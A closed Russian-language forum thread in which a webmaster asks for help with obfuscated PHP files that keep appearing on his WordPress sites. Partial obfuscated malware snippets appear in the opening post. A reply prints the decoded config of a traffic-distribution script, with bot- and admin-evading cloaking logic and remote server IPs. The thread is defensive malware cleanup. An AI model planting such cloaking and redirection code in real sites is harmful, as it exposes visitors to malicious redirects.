Вирус / вредоносный скрипт

Статус
В этой теме нельзя размещать новые ответы.

yaponskky

Постоялец
Регистрация
23 Авг 2018
Сообщения
54
Реакции
7
Всем привет. Ребят помогите расшифровать код. Есть пару сайтов на вордпрессе, и один статичный, на мобирайзе, и в один момент в корне сайтов и в подпапках начали появляться пхп файлы с рандомным названием и таким содержимым:

PHP:
<?php
$quwsmyc = 'Hoxt5vle89bs-_p4#r2\'i*7ndk3aum1yg0c';$quvzz = Array();$quvzz[] = $quwsmyc[0].$quwsmyc[21];$quvzz[] = $quwsmyc[16];$quvzz[] = $quwsmyc[26].$quwsmyc[34].$quwsmyc[15].$quwsmyc[26].$quwsmyc[7].$quwsmyc[27].
....

как не пробовал раскодировать... не получается... плагины все обновил, движок, а файлы все равно появляются (

Скачал архив сайта на локал, МС антивирь нашел еще такую дрянь:

PHP:
<?php
$_067qdi = basename/*l*/(/*bug*/trim/*2zhe*/(/*n8o*/preg_replace/*y1*/(/*19q*/rawurldecode/*nkwb*/(/*n*/"%2F%5C%28.%2A%24%2F"/*hy*/)/*zt*/, '', __FILE__/*n7*/)/*s*//*t*/)/*9*//*hl8jb*/)/*8hgzu*/;$_053na = "GVF%10%18S%00%02Z%40%0C%07G%09C%12J%5CV%08%3BPA%07%17%0AVD9%5BKR%04%10V%0ENJF%24Kl%5C%5CQ%0C%0AV%06N%10%1B%5CU%07UfT%0A%0AGK%11%170MB%03YMREC%1F%0EXJT%24%3AF%1CVB%0A%13V%0ETC%5B%1E%09U%03

вижу команда rawurldecode... пробовал этот код в онлайн rawurldecode, но не раскодирует
 
Последнее редактирование модератором:

duxabilii

Постоялец
Регистрация
3 Фев 2012
Сообщения
61
Реакции
37
Глянуть бы на полную версию сгенерированного файла и файла, на который антивирус ругается. Или же полный архив выложите, чтобы понять, где эта зараза спряталась
 

yaponskky

Постоялец
Регистрация
23 Авг 2018
Сообщения
54
Реакции
7
Глянуть бы на полную версию сгенерированного файла и файла, на который антивирус ругается. Или же полный архив выложите, чтобы понять, где эта зараза спряталась

вот, нашел еще более сложный вирус, вероятно он и генерит рендомно эти файлы. Причем засада в том, что он может раскидывать файлы и модифицировать существующие начиная от корня папки хостинга...

Я заархивировал, все таки вирусня
 

Вложения

  • .0f897ed3.zip
    23,4 KB · Просмотры: 7

hydropericardium

Постоялец
Регистрация
20 Июн 2018
Сообщения
72
Реакции
20
как не пробовал раскодировать... не получается... плагины все обновил, движок, а файлы все равно появляются (
Вирус может быть так же в теме\ядре\БД, вам надо найти его и удалять, а устранять последстия.
Прогоните весь сайт серверным ai-bolit
 

yaponskky

Постоялец
Регистрация
23 Авг 2018
Сообщения
54
Реакции
7
Вирус может быть так же в теме\ядре\БД, вам надо найти его и удалять, а устранять последстия.
Прогоните весь сайт серверным ai-bolit
да, я зарегал новый хостинг, на локал качаю сайт, чекаю айболитом, удаляю кучу дряни и заливаю на новый хостинг, там еще чекаю "Anti-malware" - очень годный плагин, и бд чекает тоже. Дальше пару недель выжидаю, если ничего нового не появится - следующий сайт. Просто хотел понять какой файл источник... но вероятно это дырявый плагин... хотя я уже все обновил
 

duxabilii

Постоялец
Регистрация
3 Фев 2012
Сообщения
61
Реакции
37
вот, нашел еще более сложный вирус, вероятно он и генерит рендомно эти файлы. Причем засада в том, что он может раскидывать файлы и модифицировать существующие начиная от корня папки хостинга...

Я заархивировал, все таки вирусня

Расковырял исходный код. Дальше копать лень.
Вот настройки расшифрованные (те, которые внизу файла в переменной $config)
Код:
array (
  'route' => '44ik04ku',
  'tds_port' => '80',
  'tds_filter' => 'if ($_SERVER[\'REQUEST_METHOD\'] != \'GET\' || empty($_SERVER[\'HTTP_ACCEPT_LANGUAGE\']) || strpos($_SERVER["HTTP_REFERER"], $_SERVER["HTTP_HOST"]) !== FALSE)
{
    return FALSE;
}
if (empty($_SERVER[\'HTTP_USER_AGENT\']) || preg_match(\'/(yandexbot|baiduspider|archiver|track|crawler|google|msnbot|ysearch|search|bing|ask|indexer|majestic|scanner|spider|facebook|Bot)/i\', $_SERVER[\'HTTP_USER_AGENT\']))
{
    return FALSE;
}
foreach (array(\'/\\.css/\', \'/\\.swf/\', \'/\\.ashx/\', \'/\\.docx/\', \'/\\.doc/\', \'/\\.xls/\', \'/\\.xlsx/\', \'/\\.xml/\', \'/\\.jpg/\', \'/\\.pdf/\', \'/\\.png/\', \'/\\.gif/\', \'/\\.ico/\', \'/\\.js/\', \'/\\.txt/\', \'/ajax/\', \'/cron\\.php/\', \'/wp\\-login\\.php/\', \'/\\/wp\\-includes\\//\', \'/\\/wp\\-admin/\', \'/\\/admin\\//\', \'/\\/wp\\-content\\//\', \'/\\/administrator\\//\', \'/phpmyadmin/i\', \'/xmlrpc\\.php/\', \'/\\/feed\\//\', ) as $regex)
{
    if (preg_match($regex, @$_SERVER[\'REQUEST_URI\']))
    {
        return FALSE;
    }
}
return TRUE;',
  'tds_path' => '/readme.php',
  'tds_ip' => '138.201.1.11',
)
 

Вложения

  • decode.zip
    3,8 KB · Просмотры: 2

yaponskky

Постоялец
Регистрация
23 Авг 2018
Сообщения
54
Реакции
7
Расковырял исходный код. Дальше копать лень.
Вот настройки расшифрованные (те, которые внизу файла в переменной $config)
Код:
array (
  'route' => '44ik04ku',
  'tds_port' => '80',
  'tds_filter' => 'if ($_SERVER[\'REQUEST_METHOD\'] != \'GET\' || empty($_SERVER[\'HTTP_ACCEPT_LANGUAGE\']) || strpos($_SERVER["HTTP_REFERER"], $_SERVER["HTTP_HOST"]) !== FALSE)
{
    return FALSE;
}
if (empty($_SERVER[\'HTTP_USER_AGENT\']) || preg_match(\'/(yandexbot|baiduspider|archiver|track|crawler|google|msnbot|ysearch|search|bing|ask|indexer|majestic|scanner|spider|facebook|Bot)/i\', $_SERVER[\'HTTP_USER_AGENT\']))
{
    return FALSE;
}
foreach (array(\'/\\.css/\', \'/\\.swf/\', \'/\\.ashx/\', \'/\\.docx/\', \'/\\.doc/\', \'/\\.xls/\', \'/\\.xlsx/\', \'/\\.xml/\', \'/\\.jpg/\', \'/\\.pdf/\', \'/\\.png/\', \'/\\.gif/\', \'/\\.ico/\', \'/\\.js/\', \'/\\.txt/\', \'/ajax/\', \'/cron\\.php/\', \'/wp\\-login\\.php/\', \'/\\/wp\\-includes\\//\', \'/\\/wp\\-admin/\', \'/\\/admin\\//\', \'/\\/wp\\-content\\//\', \'/\\/administrator\\//\', \'/phpmyadmin/i\', \'/xmlrpc\\.php/\', \'/\\/feed\\//\', ) as $regex)
{
    if (preg_match($regex, @$_SERVER[\'REQUEST_URI\']))
    {
        return FALSE;
    }
}
return TRUE;',
  'tds_path' => '/readme.php',
  'tds_ip' => '138.201.1.11',
)

круто, спасибо огромное, не полностью конечно ясно что код делает.
А вот айпи 138.201.1.11 думаю заблокировать не лишним будет
 

duxabilii

Постоялец
Регистрация
3 Фев 2012
Сообщения
61
Реакции
37
круто, спасибо огромное, не полностью конечно ясно что код делает.
А вот айпи 138.201.1.11 думаю заблокировать не лишним будет
Там в коде еще ИП 77.87.193.14 светится. И его лучше прикрыть. ИМХО
 

yaponskky

Постоялец
Регистрация
23 Авг 2018
Сообщения
54
Реакции
7
у меня WP.

Да, вылечил так - antimalware - небезизвестный сканер / плагин в ВП, он обновляется и даже вычищает с файлов сам... причем безопасно. Вот одновременно везде сделал полный скан и чистку.... и все
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху